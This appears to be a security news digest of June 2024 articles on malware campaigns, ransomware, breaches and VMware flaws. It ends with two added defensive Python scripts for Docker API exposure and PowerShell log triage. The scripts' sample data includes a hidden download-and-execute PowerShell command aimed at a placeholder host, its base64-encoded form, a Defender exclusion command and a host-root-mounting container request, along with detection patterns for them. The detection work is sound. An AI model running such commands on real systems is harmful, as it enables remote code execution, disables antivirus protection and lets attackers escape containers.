Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12732
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-06-18 13:33:57 | thehackernews | MALWARE | Cybercriminals Utilize Pirated Software to Deploy Malware and Stealers | Threat actors are using free or counterfeit software to distribute Hijack Loader and Vidar Stealer malware.
Compromised Cisco Webex Meetings app downloads lead to the execution of stealthy malware loaders via DLL side-loading.
The malware runs with elevated privileges and adds its own paths to Windows Defender's exclusion list to avoid detection.
Apart from stealing information, the malware also installs a cryptocurrency miner and other malicious payloads on victims' systems.
Techniques involve PowerShell scripts and deceptive browser update prompts to entice victims into executing malicious code.
Detection is harder because the malicious code is loaded into a legitimate host process via DLL side-loading and because the infection chain depends on the victim's own actions.
Multiple cybersecurity firms have reported on the diverse tactics and payloads utilized in recent sophisticated phishing and malware campaigns.
Security experts emphasize the importance of vigilance when downloading software and clicking on links, even from seemingly legitimate sources. | Details |
| 2024-06-18 13:18:16 | theregister | CYBERCRIME | U.S. Ends Aid for Providers Affected by Major Healthcare Cyberattack | The U.S. government will cease financial support on July 12 for healthcare providers impacted by the Change Healthcare ransomware attack in February.
The Centers for Medicare & Medicaid Services (CMS) initiated support programs in March offering funding and relaxed rules for affected organizations to maintain operations.
Over $3.2 billion in accelerated payments have been disbursed to nearly 9,000 Medicare providers to help manage cash flow disruptions caused by the cyberattack.
The support measures let Medicare Advantage and Medicaid plans advance funding to providers and allowed Medicare Administrative Contractors to accept paper claims while electronic systems were offline.
Though most of the emergency funding (96%) has been repaid, ongoing challenges persist for some providers beyond the July 12 cutoff.
CMS continues to encourage all healthcare entities to prioritize cybersecurity enhancements and remains ready to address future cyber incidents.
The ransomware attack has been one of the costliest for the healthcare sector, with estimated costs nearing $1 billion, including a $22 million ransom payment to the attackers. | Details |
| 2024-06-18 11:30:44 | theregister | DATA BREACH | Scottish NHS Board Data Leaked, Ransom Not Paid | NHS Dumfries and Galloway's CEO has confirmed that cybercriminals accessed and copied sensitive data during a February cyberattack.
The board, which serves a region of roughly 150,000 residents, refused to pay the ransom, after which the stolen data was leaked.
Victims are primarily residents from Dumfries and Galloway; targeted communications and general notices are being distributed.
The leaked data raises concerns over identity theft, follow-on attacks, extortion, and mental health impacts.
The situation parallels the 2022 Medibank breach in Australia, which also faced a ransom demand that was not met.
Efforts to analyze and prioritize the leaked data focus on identifying and assisting high-risk or vulnerable patients.
CEO Julie White offers an apology and reiterates the organization's commitment to transparency and adherence to law enforcement advice.
Dumfries and Galloway NHS has published a detailed FAQ and summary online to clarify the breach's context and implications. | Details |
| 2024-06-18 11:25:18 | thehackernews | MISCELLANEOUS | Report Highlights Growing Investment in SaaS Security for 2025 | Seventy percent of enterprises have initiated dedicated teams to bolster security for Software as a Service (SaaS) applications.
Despite 2023's economic and job market challenges, organizations have markedly increased resources for SaaS security, including a 56% rise in staffing and a 39% increase in budget allocations.
The survey reveals a significant shift in prioritization, with 80% of organizations now focusing on SaaS security, a sharp contrast to its historical position as an afterthought.
Enhanced SaaS security strategies have led to better capability maturation and visibility into SaaS applications, with marked improvements in detection and configuration management.
Major challenges persist, particularly in achieving visibility into business-critical applications and managing risks associated with third-party apps and SaaS misconfigurations.
The survey points to the effectiveness of SaaS Security Posture Management (SSPM) tools, with users reporting better control and easier management of SaaS security than with other methods.
Overall, the survey data indicates improving SaaS security outcomes and fewer incidents, suggesting that sustained investment and strategic implementation are paying off. | Details |
| 2024-06-18 09:42:44 | thehackernews | MALWARE | New Malware Exploits Docker APIs for Crypto Mining Operations | Cybersecurity experts have discovered a new malware targeting openly accessible Docker API endpoints to deploy cryptocurrency miners.
The toolkit includes remote-access components that fetch further payloads and spread to other hosts over SSH.
The attackers target Docker hosts that expose the daemon API on TCP port 2375, then carry out a multi-stage attack covering reconnaissance, privilege escalation, and deployment of payloads.
A chain of scripts and binaries, including shell scripts named "b.sh" and "ar.sh," is used to set up remote access, scan for other vulnerable hosts, and install additional payloads.
Parts of the toolkit have been rewritten in Go, notably a binary named "chkstart," which makes analysis harder than for the earlier shell-script versions.
Additional payloads like "exeremo" for lateral movement and "fkoths," a Go-based binary to erase traces, signify an advanced attempt to maintain persistence and avoid detection.
These findings indicate continuous improvement and adaptation by the attackers, highlighting persistent security risks associated with misconfigured Docker hosts. | Details |
| 2024-06-18 08:26:15 | thehackernews | CYBERCRIME | VMware Patches Critical Flaws in Cloud and Server Platforms | VMware has released critical security updates for Cloud Foundation, vCenter Server, and vSphere ESXi.
The updates address vulnerabilities that could lead to privilege escalation and remote code execution.
Identified vulnerabilities include two discovered by researchers at QiAnXin LegendSec and one by Deloitte Romania.
Affected products are vCenter Server 7.0 and 8.0 and Cloud Foundation 4.x and 5.x; fixes ship in vCenter Server 7.0 U3r, 8.0 U1e, and 8.0 U2d.
A similar DCE/RPC flaw in vCenter Server (CVE-2023-34048) was patched in October 2023.
VMware advises users to apply these critical patches promptly despite no current active exploitation reports. | Details |
| 2024-06-18 07:40:00 | thehackernews | MALWARE | Two Malaysians Extradited for Android Malware Banking Scam | Singapore Police Force has extradited two Malaysians linked to an Android malware scam targeting Singapore citizens.
The suspects allegedly used phishing campaigns to install malicious apps on victims' devices to steal personal data and banking credentials.
In collaboration with Hong Kong and Malaysian police, a lengthy investigation linked the suspects to a criminal syndicate.
The malware disguised as discounted goods apps allowed remote access to victims' devices, capturing sensitive data and enabling unauthorized transactions.
Assets including cryptocurrency and real estate worth over $1.33 million have been seized in related arrests, with 16 criminals captured so far.
The malicious operations have affected over 4,000 victims, highlighting the extensive impact of the scam.
One suspect faces up to ten years in prison and $500,000 in fines, underlining the severity of the penalties for such cybercrimes. | Details |
| 2024-06-18 06:13:19 | theregister | MALWARE | Critical Security Flaws Found in VMware vCenter Server | VMware, now owned by Broadcom, has disclosed two critical vulnerabilities in its vCenter Server product, used to manage virtual machines and hosts.
Identified as CVE-2024-37079 and CVE-2024-37080, both vulnerabilities are rated 9.8 out of 10 for severity and involve heap-overflow issues in the DCE/RPC protocol implementation.
A malicious actor could exploit these vulnerabilities by sending a specially crafted network packet, potentially leading to remote code execution.
Although patched versions of vCenter Server and Cloud Foundation are available, there is no information about the applicability of these fixes to older vSphere versions 6.5 and 6.7, which are widely used but no longer supported.
VMware also reported a third, less critical vulnerability, CVE-2024-37081, related to local privilege escalation due to sudo misconfiguration, scoring it as important (7.8).
There are currently no known exploits of these vulnerabilities "in the wild," according to VMware.
Credit for the findings goes to Hao Zheng and Zibo Li of QiAnXin LegendSec for the two DCE/RPC flaws and to Matei "Mal" Badanoiu of Deloitte Romania for the sudo issue. | Details |
| 2024-06-18 01:18:04 | theregister | CYBERCRIME | Researchers Bypass ARM's Memory Security Feature Effectively | Researchers from Seoul National University, Samsung Research, and the Georgia Institute of Technology have found a way, which they call TikTag, to break ARM's Memory Tagging Extension (MTE).
Speculative-execution gadgets let an attacker leak MTE tags with over 95% success, defeating the protection the tags are meant to provide.
MTE was designed to protect against commonly exploited memory safety vulnerabilities in C/C++ programming, like buffer overflows and heap-use-after-free attacks.
The effective bypass raises concerns about MTE’s ability to secure applications on Arm processors, despite Arm’s reassurances.
Findings challenge earlier works, including those by Google's Project Zero, which did not identify side-channel attacks capable of breaking MTE.
Researchers demonstrated their technique's efficacy by extracting MTE tags from Google Chrome on Android and Linux, using proof-of-concept code now available on GitHub.
The suggested mitigation involves placing speculation barriers and limiting gadget construction in affected software like Chromium and Linux kernel code.
Despite acknowledging the issue, Arm insists the value of MTE stands, although they recommend additional mechanisms to prevent speculative execution oracles. | Details |
| 2024-06-17 23:51:17 | theregister | DATA BREACH | Consulting Firms Settle for $11.3M in COVID-19 Data Breach Case | Guidehouse and Nan McKay and Associates (NMA) agreed to pay $11.3 million to settle allegations related to cybersecurity failures.
The settlements stem from inadequate security testing of New York's Emergency Rental Assistance Program (ERAP) application during the COVID-19 pandemic.
Both firms failed to test the ERAP system effectively before deployment, and sensitive data began leaking shortly after the system went live.
About 12 hours post-launch, it was discovered that personal information was leaking onto the internet.
Although an investigation indicated no unauthorized use of Personally Identifiable Information (PII), the exposure triggered a formal "Information Security Breach" protocol.
In addition to the data breach, Guidehouse admitted to using unauthorized third-party cloud software for storing PII.
The US Attorney emphasized the importance of fulfilling cybersecurity obligations, especially when handling sensitive information under federal contracts. | Details |
| 2024-06-17 22:34:15 | bleepingcomputer | MALWARE | Malware Disguised as Fixes in Fake Chrome and Word Errors | A new malware campaign uses fake error messages from popular applications like Google Chrome, Microsoft Word, and OneDrive to deceive users into running malicious PowerShell scripts.
The activity spans several threat actors and campaign clusters, including ClearFake, ClickFix, and TA571, the last of which is known for high-volume spam operations that distribute malware and ransomware.
The lure convinces users that there is a genuine problem with their software and offers a PowerShell "fix"; running it triggers the malware installation instead.
Techniques employed in these attacks include malicious overlays on websites, deceptive JavaScript in HTML attachments, and emails masquerading as official documents that prompt PowerShell command execution.
Representative malware payloads delivered by these scripts include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.
Proofpoint analysts identified three primary attack chains, suggesting a progressive refinement and testing of techniques to increase infection rates.
Overall, the attackers exploit user trust and limited technical awareness, together with the fact that Windows will run a PowerShell command the user pastes in themselves without objection. | Details |
| 2024-06-17 20:16:30 | theregister | CYBERCRIME | Federal Arrests Target Leaders of $430M Dark Web Marketplace | Federal agents arrested Thomas Pavey and Raheim Hamilton, alleged operators of the dark-web marketplace Empire Market, accused of facilitating illegal transactions valued over $430 million.
Empire Market, active from 2018 through 2020, offered a wide range of illicit goods including drugs, stolen account credentials, counterfeit money, and malware.
The marketplace supported thousands of vendors and was reached over the Tor network, with transactions conducted exclusively in cryptocurrency to preserve anonymity.
The site encouraged the use of cryptocurrency tumblers to obscure the origins of transaction funds, complicating efforts by law enforcement to trace illegal activities.
In addition to current charges, Pavey and Hamilton were previously involved in selling counterfeit U.S. currency on another now-defunct dark-web market, AlphaBay.
Authorities seized $75 million in cryptocurrency, along with cash and precious metals, during the investigation.
The charges include drug trafficking, computer fraud, and money laundering, among others, and carry a potential sentence of life imprisonment.
Both suspects remain detained awaiting federal arraignment. | Details |
| 2024-06-17 20:00:50 | bleepingcomputer | CYBERCRIME | Panera Bread Likely Paid Ransom in Recent Cyberattack | Panera Bread likely paid a ransom following a ransomware attack in March, which disrupted their operations for a week.
The attack encrypted all virtual machines, affecting Panera's website, mobile app, point-of-sale, and internal systems.
Stolen data included employee names and Social Security numbers, and Panera has begun sending breach notifications to affected individuals.
Internal communications suggested Panera received assurances that the stolen data would be deleted and not published.
An alleged employee claimed on Reddit that Panera paid the hackers to avoid the public leak of stolen data.
No ransomware gang has claimed responsibility for the attack or threatened to leak the data, which is unusual if no payment was made.
Ransomware attacks often involve data theft and encryption, using this leverage to demand payment for data deletion and decryption.
Paying a ransom does not guarantee data deletion; threat actors may not fulfill their promises as seen in other recent incidents. | Details |
| 2024-06-17 17:47:28 | theregister | DATA BREACH | Blackbaud Settles for $6.75 Million Over 2020 Ransomware Breach | Blackbaud, a cloud software company, has agreed to pay $6.75 million to settle the California attorney general's claims of cybersecurity negligence around a 2020 ransomware attack.
The attorney general criticized Blackbaud for insufficient cybersecurity measures and misleading the public about the breach's impact, which involved personal data exposure.
Blackbaud had previously settled similar allegations with 49 other states and the District of Columbia for $49.5 million, and with the Federal Trade Commission without a monetary penalty.
The ransomware breach resulted in unauthorized access to the sensitive personal information of millions, including social security numbers and medical details.
Critical allegations included the use of weak or default passwords and the lack of multi-factor authentication for accessing sensitive areas.
The settlement requires Blackbaud to enhance security practices, including better password management, data retention, and infrastructure monitoring.
This is viewed as the final settlement in the U.S. related to Blackbaud's 2020 incident after prior multiple state settlements and a smaller fine to SEC. | Details |
| 2024-06-17 17:42:03 | bleepingcomputer | NATION STATE ACTIVITY | Chinese Espionage Group Exploits F5 BIG-IP for Data Theft | Suspected Chinese hackers, dubbed 'Velvet Ant,' utilized custom malware on compromised F5 BIG-IP devices to establish persistent network access and clandestinely exfiltrate sensitive data for three years.
The hacking group exploited vulnerabilities in outdated F5 BIG-IP appliances used for firewall management and network load balancing, which were exposed online.
Velvet Ant deployed various malware, including a modular remote access Trojan (RAT) called PlugX, traditionally favored by Chinese cyber actors for data harvesting.
The attackers disguised their malicious traffic as legitimate, letting them bypass corporate security controls and steal customer and financial information over a long period without being detected.
Despite initial eradication efforts by security professionals at Sygnia, the hackers redeployed their tools with updated configurations to evade detection and maintain their foothold.
Sygnia underscored the critical need for a layered, comprehensive security strategy for network devices, which are often targets for initial breaches.
The report indicated a worrying trend in 2023, where China-linked hackers increasingly exploited network infrastructure vulnerabilities across various devices to gather intelligence and infiltrate further into target networks. | Details |
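The Docker API item above (the miner campaign hitting hosts with the daemon API on TCP port 2375) describes an exposure that is easy to check for. The script below is an added example, not code from the research that reported the campaign: it reads a daemon.json to find API listeners published over plain TCP without TLS client verification, and inspects a container-create request body for the host-access settings (root bind-mount, privileged flag, host namespaces, chroot/nsenter into the mount) that turn an API call into control of the host. The daemon.json and create body are constructed samples; the 203.0.113.x-free command and `uname -a` stand in for whatever a real request would carry.

```python
"""Added example for the exposed-Docker-API item above; not code from the
reporting on the campaign. Two defender-side checks for a Docker host:
(1) does daemon.json publish the API over plain TCP, and (2) does a
/containers/create body request host access of the kind used to break out
of a container. All sample inputs are constructed."""
from __future__ import annotations

import json
from dataclasses import dataclass, field

# Host paths whose bind-mount into a container effectively hands over the host.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")


def plain_tcp_listeners(daemon_json: str) -> list[str]:
    """Return tcp:// listeners from daemon.json that are not protected by TLS client auth."""
    cfg = json.loads(daemon_json)
    hosts = cfg.get("hosts", [])
    if isinstance(hosts, str):
        hosts = [hosts]
    tls_required = bool(cfg.get("tlsverify")) and bool(cfg.get("tlscacert"))
    return [h for h in hosts if h.startswith("tcp://") and not tls_required]


@dataclass
class CreateFinding:
    container: str
    reasons: list[str] = field(default_factory=list)


def _is_sensitive(host_path: str) -> bool:
    if host_path in SENSITIVE_HOST_PATHS:
        return True
    return any(host_path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def inspect_create_request(name: str, body: dict) -> CreateFinding:
    """Flag HostConfig settings in a container-create body that grant host access."""
    hc = body.get("HostConfig") or {}
    finding = CreateFinding(container=name)
    if hc.get("Privileged"):
        finding.reasons.append("privileged container")
    for ns in ("PidMode", "NetworkMode", "IpcMode"):
        if hc.get(ns) == "host":
            finding.reasons.append(f"{ns}=host")
    # Binds are "host:container[:opts]"; Mounts is the structured equivalent.
    sources = [b.split(":", 1)[0] for b in hc.get("Binds") or []]
    sources += [m["Source"] for m in hc.get("Mounts") or []
                if m.get("Type") == "bind" and m.get("Source")]
    for src in sources:
        if _is_sensitive(src):
            finding.reasons.append(f"bind-mounts host path {src}")
    cmd = " ".join(body.get("Cmd") or [])
    if "chroot /mnt" in cmd or "nsenter" in cmd:
        finding.reasons.append("command pivots into the host filesystem")
    return finding


# Constructed daemon.json: API on 0.0.0.0:2375 with no TLS, the exposure the item describes.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed create body: throwaway container with the host root mounted and a chroot into it.
SAMPLE_CREATE_BODY = {
    "Image": "alpine",
    "Cmd": ["sh", "-c", "chroot /mnt sh -c 'uname -a'"],
    "HostConfig": {"Binds": ["/:/mnt"]},
}

if __name__ == "__main__":
    print("plain-TCP listeners:", plain_tcp_listeners(SAMPLE_DAEMON_JSON))
    print(inspect_create_request("sample", SAMPLE_CREATE_BODY))
```

On a real host, feed `plain_tcp_listeners` the contents of `/etc/docker/daemon.json` (and check systemd drop-ins that pass `-H tcp://...` to dockerd, which this function does not see), and feed `inspect_create_request` the JSON bodies captured by an API-level proxy or dockerd debug logging. A listener on 2376 with `tlsverify` set is not flagged; anything on 2375 without it is.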
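Two items above turn on PowerShell the victim or the malware runs: the fake Chrome/Word/OneDrive error messages that get a user to paste a "fix" into PowerShell, and the Hijack Loader chain that adds Windows Defender exclusions. Both leave script-block text in the PowerShell Operational log (Event ID 4104). The script below is an added example, not from Proofpoint's or any other report, and its indicators are generic rather than the campaigns' own: it scores exported script-block text for a download piped into Invoke-Expression, a hidden window, an execution-policy bypass, a base64 `-EncodedCommand` (which it decodes so the rules can see the payload), and `Add-MpPreference` exclusions. The log records are constructed; `example.invalid` is a placeholder host.

```python
"""Added example for the fake-error ("paste this fix") item and the
Defender-exclusion step of the pirated-software item; not code from any
vendor report. Scores PowerShell script-block text (Event ID 4104
ScriptBlockText from Microsoft-Windows-PowerShell/Operational, exported to
text) against generic indicators. Sample records are constructed."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

DOWNLOAD = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)"
EXEC = r"(?:iex|invoke-expression)"

# (label, weight, regex) applied to the script text plus any decoded -EncodedCommand payload.
RULES = [
    ("download-and-execute", 3, re.compile(rf"\b{EXEC}\b.*\b{DOWNLOAD}\b|\b{DOWNLOAD}\b.*\|\s*{EXEC}\b", re.I)),
    ("defender-exclusion", 3, re.compile(r"add-mppreference\s+-exclusion(?:path|process|extension)", re.I)),
    ("hidden-window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy-bypass", 1, re.compile(r"-e(?:xecutionpolicy|xec|x|p)\s+bypass", re.I)),
    ("encoded-command", 1, re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/]{16,}={0,2}", re.I)),
]
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)


def with_decoded_payloads(script: str) -> str:
    """Append the UTF-16LE plaintext of any -EncodedCommand argument so the rules can see it."""
    decoded = []
    for m in ENC_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not a PowerShell payload
    return script + ("\n" + "\n".join(decoded) if decoded else "")


@dataclass
class Verdict:
    record_id: str
    score: int
    hits: list[str]
    text: str  # original text plus decoded payloads, for the analyst


def score_record(record_id: str, script_text: str) -> Verdict:
    text = with_decoded_payloads(script_text)
    hits = [label for label, _w, rx in RULES if rx.search(text)]
    score = sum(w for label, w, _rx in RULES if label in hits)
    return Verdict(record_id, score, hits, text)


def triage(records: list[tuple[str, str]], threshold: int = 3) -> list[Verdict]:
    """Return records scoring at or above the threshold, highest score first."""
    verdicts = [score_record(rid, txt) for rid, txt in records]
    return sorted((v for v in verdicts if v.score >= threshold), key=lambda v: -v.score)


# Constructed (record id, ScriptBlockText) pairs; the fourth is benign admin use.
_ENCODED = base64.b64encode("iex (irm http://example.invalid/a.ps1)".encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    ("4104-1", 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/fix.ps1)"'),
    ("4104-2", "Add-MpPreference -ExclusionPath 'C:\\ProgramData\\svc'"),
    ("4104-3", f"powershell -nop -w hidden -e {_ENCODED}"),
    ("4104-4", "Get-ChildItem -Path C:\\Logs -Recurse | Where-Object { $_.Length -gt 1MB }"),
]

if __name__ == "__main__":
    for v in triage(SAMPLE_RECORDS):
        print(v.record_id, v.score, v.hits)
```

The weights are deliberately simple: a download-and-execute or a Defender exclusion alone clears the default threshold, while hidden-window and bypass flags only raise the score of something already suspicious, since administrators use them legitimately. Script-block logging must be enabled for 4104 events to exist at all, and a 4104 record for `Add-MpPreference` is worth alerting on regardless of score in most environments.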